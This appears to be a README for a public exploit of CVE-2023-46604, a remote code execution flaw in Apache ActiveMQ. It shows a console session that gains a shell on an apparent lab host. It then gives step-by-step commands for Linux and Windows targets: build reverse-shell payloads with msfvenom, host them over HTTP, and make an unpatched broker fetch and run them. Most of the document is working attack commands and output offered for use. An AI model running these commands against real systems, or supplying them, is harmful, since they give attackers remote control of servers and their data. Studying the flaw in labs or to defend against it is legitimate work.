$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls -lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
This exploit builds on the original proof of concept by X1r0z (https://github.com/X1r0z/ActiveMQ-RCE, https://github.com/X1cT34m) and extends it to deliver a reverse shell using a payload generated with the Metasploit Framework (https://github.com/rapid7/metasploit-framework).
Important: Before use, replace the placeholder IP address 0.0.0.0 (line 11 of each XML file) with the IP address of the host that serves the msfvenom payload. If you follow the commands below, that is your listener IP address, and {IP_Of_Hosted_XML_File} is the same listener IP address. On receiving the crafted OpenWire message, an unpatched broker fetches the XML from that URL and instantiates the Spring beans it defines, which is where the payload is downloaded and executed on the target, so the target must be able to reach your host on port 8001 and on {Your_Listener_Port}. Start your handler (for example a Metasploit exploit/multi/handler or a netcat listener) on {Your_Listener_Port} before running the exploit, and note that python3 -m http.server blocks, so run it in a second terminal or background it.
Linux target:

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Windows target:

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f exe -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml